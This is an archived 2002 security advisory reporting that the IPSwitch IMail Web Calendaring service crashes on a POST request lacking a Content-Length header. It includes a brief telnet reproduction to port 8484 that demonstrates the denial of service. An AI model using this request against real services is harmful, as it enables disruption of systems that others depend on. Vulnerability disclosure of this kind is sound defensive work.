Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: web5581.htm

IMail Web Calendaring service crash using malformed POST request
31th Jul 2002 [SBWID-5581]

	IMail Web Calendaring service crash using malformed POST request


	IPSwitch IMail, All Current Versions


	In 2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #6:

	the IMail Web Calendaring service, iwebcal, can be crashed by issuing  a
	malformed POST request.. specifically one that  neglects  to  include  a
	"Content-Length:" parameter


	xxx@xx:~$ telnet 8484


	Connected to

	Escape character is '^]'.

	POST / HTTP/1.0


	Connection closed by foreign host.



	[the iwebcal service has crashed]


	xxx@xx:~$ telnet 8484


	telnet: connect to address Connection refused




	this is pretty obvious, it's a simple DoS.. and it looks  as  if  remote
	code execution is not possible due to the  nature  of  this  programming




	sorry, no backdoors this time.. disable the service before someone  else
	does? or wait for a vendor patch after a few hoaxes are debunked..


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH